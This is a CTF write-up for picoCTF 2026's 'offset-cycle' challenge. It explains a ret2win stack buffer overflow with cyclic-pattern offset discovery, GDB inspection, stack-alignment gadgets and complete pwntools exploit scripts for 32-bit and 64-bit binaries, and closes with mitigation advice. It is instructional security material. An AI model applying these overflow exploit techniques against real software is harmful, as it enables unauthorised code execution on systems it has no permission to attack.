offset-cycle picoCTF 2026 Solution

Published: March 20, 2026

Description

It's a race against time. Solve the binary exploit ASAP.

Launch the challenge instance and connect via SSH.

Download and analyse the provided files. The server gives you both a C source file and a compiled binary, so you can read the buffer size directly from the source without any disassembly.

Solution

Want to try it yourself first?

The guided walkthrough reveals hints one step at a time.

Walk me through it
  1. Step 1
    Reconnaissance
    Observation
    I noticed the challenge description warns the binary is regenerated per instance and there is only ~120 seconds to exploit it, which suggested scripting every step and running file vuln first to detect whether the binary is 32-bit or 64-bit before choosing p32 vs p64 and the correct register names.
    This challenge regenerates a fresh binary from a code bank on each instance and gives you only ~120 seconds to exploit it, so script everything and don't hand-edit offsets. Critically, the generated binary may be 32-bit OR 64-bit - run file vuln first and let the answer pick your tooling (p32/EIP/EBP vs p64/RIP/RBP). Then check protections and the interface.
    bash
    file vuln                       # 32-bit (ELF 32) or 64-bit (ELF 64)? decides p32 vs p64
    bash
    checksec vuln
    bash
    nc <HOST> <PORT_FROM_INSTANCE>
    bash
    objdump -d vuln | grep -A10 win

    Expected output

    vuln: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, not stripped
    What didn't work first

    Tried: Skip file vuln and assume 64-bit because most modern systems are 64-bit, then use p64() and RIP-based offsets throughout.

    The challenge explicitly randomises the binary between 32-bit and 64-bit on each instance. If the binary is 32-bit, p64() packs the wrong number of bytes, the payload length is off, and the return address lands in garbage. Running file vuln first costs one second and avoids a silent mismatch that produces a crash with no useful error.

    Tried: Use readelf -h vuln instead of file vuln to check the architecture.

    readelf works and would show the EI_CLASS field (ELFCLASS32 vs ELFCLASS64), but the output is verbose and requires reading the header fields manually. file vuln produces a single human-readable line like 'ELF 32-bit LSB executable' that is faster to parse under the 120-second timer and less error-prone.

    Learn more

    Check the architecture first. Because each instance ships a different binary, you cannot assume 64-bit. A 32-bit ELF uses 4-byte addresses, packs them with p32(), overflows through EBP into EIP, and has no 16-byte movaps alignment requirement; win addresses live in the 0x0804xxxx range. A 64-bit ELF uses 8-byte p64() addresses, overflows RBP into RIP, and may need a ret-gadget for stack alignment. Everything below is written for the 64-bit case; the final step shows the 32-bit variant.

    checksec is a script that inspects a compiled binary for modern security mitigations. The key properties it reports are: NX (non-executable stack), PIE (position-independent executable, randomises base address), stack canaries (secret values that detect overflows), RELRO (read-only relocations, hardens GOT), and FORTIFY (compile-time buffer checks).

    For a basic ret2win challenge, you want to see: NX enabled (so you can't run shellcode on the stack), no PIE or PIE with a leak (so the win address is predictable), no stack canary (so you can overwrite the return address without detection). Understanding these protections upfront tells you exactly which exploit technique is applicable.

    • NX on, no canary, no PIE: classic ret2win with a fixed win address
    • NX on, no canary, PIE on: need an address leak first
    • NX off: shellcode injection is possible (see offset-cycleV2)
  2. Step 2
    Find the buffer overflow offset
    Observation
    I noticed the binary accepts user input into a fixed-size buffer with no length check, which suggested sending a De Bruijn cyclic pattern long enough to overflow the buffer and reading the unique bytes at RSP after the crash to pinpoint the exact padding length before the return address.
    The primary approach is to read the buffer allocation size directly from objdump disassembly of the vuln function (look for the sub esp/rsp instruction value and compute the offset manually from the hex). Because the server also provides C source, you can read the buffer size straight from the source without any disassembly. The cyclic/GDB approach below is a valid alternative but is not the primary intended route.
    python
    python3 -c "from pwn import *; print(cyclic(200))" > pattern.txt
    bash
    # Crash inside GDB and inspect the stack interactively:
    bash
    gdb -q ./vuln
    bash
    (gdb) run < pattern.txt
    bash
    # When SIGSEGV hits, dump the stack to find the overflowing pattern:
    bash
    (gdb) x/s $rsp
    bash
    (gdb) x/16gx $rsp
    bash
    # Then plug the leaked bytes back into cyclic_find:
    python
    python3 -c "from pwn import *; print(cyclic_find(b'<value at rsp>'))"

    The chained -ex form (gdb -ex 'run' -ex 'x/s $rsp') only works when the program exits cleanly. If you want a one-liner that survives a segfault, chain a backtrace instead: gdb -batch -ex 'run < pattern.txt' -ex 'bt' -ex 'x/8gx $rsp' ./vuln. For interactive poking, drop the -batch and stay in the prompt after the crash.

    What didn't work first

    Tried: Inspect RIP directly after the crash with (gdb) info registers rip instead of dumping $rsp, then pass those bytes to cyclic_find().

    On 64-bit, the kernel rejects non-canonical addresses, so the segfault fires before RIP is updated and info registers rip often shows 0x0 or the last valid address rather than the cyclic bytes. The overflowing pattern bytes end up on the stack just below where RSP points after the crash, so x/s $rsp or x/8gx $rsp is the correct place to read them.

    Tried: Generate a 200-byte cyclic pattern and send it to a 256-byte buffer, expecting the pattern to reach the return address.

    If the buffer is larger than the pattern, the return address is never reached and the program exits cleanly with no crash. The pattern must be long enough to overflow the buffer plus any saved frame pointer (typically buffer size + 8 on 64-bit). Use a pattern of at least 300 bytes as a safe starting point when the buffer size is unknown.

    Learn more

    A cyclic pattern (also called a De Bruijn sequence) is a string where every substring of length N appears exactly once. pwntools generates these with cyclic(length). When the program crashes, whatever 4 or 8 bytes ended up in the instruction pointer (RIP/EIP) or on the stack are a unique subsequence of the pattern - cyclic_find() instantly tells you the byte offset to that position.

    The offset you find is the number of bytes of padding needed before you start overwriting the saved return address. This is typically the local buffer size plus any saved frame pointer bytes above it. Understanding this precisely is critical: one byte too few and the return address isn't overwritten; one byte too many and you start overwriting the wrong things.

    Alternative methods: disassemble the function to find the sub rsp, X instruction that allocates the buffer (Ghidra is great for this, see the Ghidra reverse engineering post), use GDB's built-in pattern commands, or check upstream source if the challenge author published it. For deeper GDB workflow tips, see the GDB for CTF guide; for the broader stack-overflow background, see Buffer overflow exploitation for CTF.

  3. Step 3
    Locate the win function address
    Observation
    I noticed the checksec output showed no PIE, meaning the binary loads at a fixed base address every run, which suggested the win function address found via objdump or pwntools ELF symbol lookup would be stable and usable directly in the payload without any runtime leak.
    Find the address of the win/flag function using objdump or pwntools ELF.
    bash
    objdump -d vuln | grep '<win>'    # binary may be named '32' or 'vuln depending on server
    bash
    # e.g.: objdump -D 32 | grep win
    python
    python3 -c "from pwn import *; e=ELF('./vuln'); print(hex(e.sym['win']))"
    What didn't work first

    Tried: Use objdump -d vuln | grep '<flag>' to find the win function, because some versions call it 'flag' instead of 'win'.

    The binary name and function name both vary per instance. Using grep '<win>' misses alternate names like 'flag', 'give_flag', or 'print_flag'. The pwntools approach e.sym['win'] also fails if the symbol has a different name. The most robust method is objdump -d vuln | grep -E '<(win|flag|give_flag)>' or iterating e.symbols to find any non-standard function near main.

    Tried: Hard-code the win address from a previous run (e.g. 0x401196) and skip the objdump step on subsequent attempts.

    Each challenge instance regenerates a fresh binary from a code bank, so the win function address changes between instances. A hard-coded address from a previous session will either point to arbitrary instructions or trigger a segfault. Always resolve the address dynamically via e.sym['win'] or re-run objdump on the current instance's binary.

    Learn more

    In a ret2win challenge, there is a function in the binary (often called win, flag, give_flag, or similar) that prints the flag but is never called in normal program flow. Your goal is to redirect execution to it by overwriting the return address.

    objdump -d disassembles the binary and shows the address of every function. pwntools' ELF class parses the binary's symbol table and lets you look up addresses by name with e.sym['win']. When PIE is disabled, these addresses are fixed and valid without any runtime leak.

    In 64-bit Linux, return addresses are 8 bytes and stored little-endian. pwntools' p64(address) function converts an integer address to the correct 8-byte little-endian representation ready to paste into your payload.

  4. Step 4
    Build and send the payload
    Observation
    I noticed that on 64-bit glibc binaries the win function calls puts or printf, both of which use SSE movaps instructions that require RSP to be 16-byte aligned at call time, which suggested inserting a bare ret gadget before the win address to flip the alignment without disturbing any registers.
    Run the exploit without an alignment gadget first. If you crash with SIGSEGV inside a movaps instruction in win() or _IO_*, then add a single ret gadget before the win address to flip the 16-byte alignment.
    bash
    # Find a RET gadget for alignment if needed:
    bash
    ROPgadget --binary vuln | grep ': ret$'
    What didn't work first

    Tried: Skip the ROPgadget step and just send the payload directly to win, assuming alignment issues only matter for libc functions and not a simple win() that calls puts().

    puts() and printf() both use SSE instructions internally on glibc x86-64. If win() calls either, a movaps instruction fires before any output is produced and the process crashes silently. The alignment gadget costs only 8 bytes in the payload and is always safe to include; omitting it based on a guess wastes one of the ~120 seconds retrying.

    Tried: Use a pop rdi; ret gadget instead of a bare ret to fix alignment, since pop rdi is a common first ROP gadget.

    A pop rdi; ret sequence pops 8 bytes off the stack into RDI and then returns, consuming one extra 8-byte slot from your payload that you did not intend. This shifts the win address in the payload by 8 bytes, causing a wrong return target unless you restructure the payload around it. A bare single-byte ret adjusts RSP by exactly 8 with no side effects and no extra payload slot needed.

    Learn more

    The stack alignment issue is a common stumbling block in 64-bit ret2win exploits. The x86-64 System V ABI requires that RSP be 16-byte aligned when a call instruction is executed (meaning RSP must be 16-byte aligned at function entry, since call pushes 8 bytes). Some functions use SSE instructions like movaps that crash with a SIGSEGV if the stack is misaligned.

    The fix is to insert an extra single-byte ret gadget before the win address in your payload. A bare ret pops 8 bytes off the stack and returns, adjusting RSP by 8 - this flips the alignment from misaligned to properly aligned before the win function's prologue runs.

    ROPgadget and ropper are tools that scan binaries for short instruction sequences ending in ret, called ROP (Return-Oriented Programming) gadgets. Even for this simple challenge, the single-byte ret gadget is your first ROP gadget. More complex exploits chain dozens of these to build arbitrary computation.

  5. Step 5
    Exploit script
    Observation
    I noticed the previous steps produced three concrete values (the offset, the win address, and the optional ret gadget address), which suggested assembling them into a single pwntools script using sendlineafter to synchronise with the server prompt and avoid timing issues over the remote connection.
    Full pwntools exploit. The RET gadget is only needed if you see a crash inside win() at a movaps instruction.
    python
    python3 - <<'EOF'
    from pwn import *
    
    HOST, PORT = "<HOST>", <PORT_FROM_INSTANCE>
    e = ELF("./vuln")
    
    OFFSET   = <offset>          # found with cyclic
    WIN      = e.sym["win"]      # address of win/flag function
    RET_GADGET = <ret_addr>      # optional: one-byte RET for 16-byte alignment
    
    payload  = b"A" * OFFSET
    payload += p64(RET_GADGET)   # remove this line if alignment isn't needed
    payload += p64(WIN)
    
    r = remote(HOST, PORT)
    r.sendlineafter(b":", payload)
    r.interactive()
    EOF

    If file vuln reported a 32-bit ELF (as the random binary often is), switch to the 32-bit packer and drop the alignment gadget entirely - 32-bit has no movaps issue:

    from pwn import *
    
    e = ELF("./vuln")
    OFFSET = <offset>          # 32-bit: buffer size + 4 (the saved EBP)
    WIN    = e.sym["win"]      # 32-bit win lands around 0x0804xxxx
    
    payload  = b"A" * OFFSET
    payload += p32(WIN)        # 4-byte little-endian, no ret-gadget needed
    
    r = remote("<HOST>", <PORT_FROM_INSTANCE>)
    r.sendlineafter(b":", payload)
    r.interactive()
    What didn't work first

    Tried: Use r.sendline(payload) instead of r.sendlineafter(b':', payload) to avoid having to know the exact prompt string.

    Without sendlineafter, pwntools sends the payload immediately before the server has finished printing the prompt and is ready to read. On a remote connection with network latency, the payload bytes arrive while the server is still writing output, causing the read to consume part of the prompt rather than the full payload. This corrupts the offset and the exploit fails with a non-segfault exit. sendlineafter synchronises sender and receiver reliably.

    Tried: Run the exploit script locally against ./vuln using process('./vuln') first to confirm it works, then switch to remote() for the server.

    Local testing is good practice in general, but this challenge regenerates a new binary for each SSH session. If you test with a locally downloaded binary and then the server spins up a new instance, the binary (and therefore the offset and win address) may differ. Always re-download the binary from the live instance and re-derive the offset and win address before sending the remote exploit.

    Learn more

    pwntools is the standard Python library for binary exploitation CTF challenges. It provides: remote(host, port) for connecting to servers, ELF for parsing binaries, p64()/p32() for packing addresses, cyclic()/cyclic_find() for offset discovery, and interactive() for dropping into an interactive shell session once exploitation succeeds.

    The sendlineafter(b":", payload) pattern waits until the program outputs a colon (the input prompt) before sending your payload. This synchronisation is important for remote exploits where network latency means you can't just blindly send data immediately.

    The r.interactive() call at the end hands control of stdin/stdout to your terminal, letting you type commands in the spawned shell or read output. In a ret2win challenge the flag is printed automatically, but interactive() is still useful to confirm the output and debug failures.

Interactive tools
  • Cyclic Pattern GeneratorGenerate de Bruijn cyclic patterns and find buffer overflow offsets. The browser equivalent of pwntools cyclic and cyclic_find.
  • pwntools Payload BuilderPack integers into little-endian bytes (p32 / p64), unpack bytes back to integers, and build flat ROP payloads with offset-based insertion.

Flag

Reveal flag

picoCTF{0ff53t_cycl3_...}

ret2win buffer overflow against a per-instance binary on a ~120s timer, so script it. Run `file vuln` first: 32-bit uses p32 + a 0x0804xxxx win address with no alignment gadget; 64-bit uses p64 and may need a RET gadget to fix movaps stack alignment. Find the offset with a cyclic pattern and locate win with objdump/pwntools.

Key takeaway

Stack buffer overflows succeed because C gives functions a flat region of memory for local variables, and writing past that region silently overwrites adjacent stack data including the saved return address. A ret2win attack simply redirects that saved address to a function that already exists in the binary, requiring no injected code at all. The same read-the-binary-then-overwrite-return-address primitive underlies more advanced techniques like ROP chains, and the defense is always the same: bounds-check every write and enable compiler stack protection.

How to prevent this

ret2win is the simplest stack overflow primitive. Any one of the standard mitigations breaks it.

  • Replace unbounded reads with bounded ones: fgets(buf, sizeof(buf), stdin), never gets() or scanf("%s", buf). The compiler warns about gets; treat the warning as an error.
  • Compile with -fstack-protector-strong. The canary detects the overflow before ret executes and aborts. Negligible runtime cost, near-perfect coverage for this bug class.
  • Don't ship a win() function that reads /flag. CTF binaries do this for educational purposes; production code should never have an "unlock everything" function reachable from a return-address overwrite.

Related reading

Want more picoCTF 2026 writeups?

Tools used in this challenge

What to try next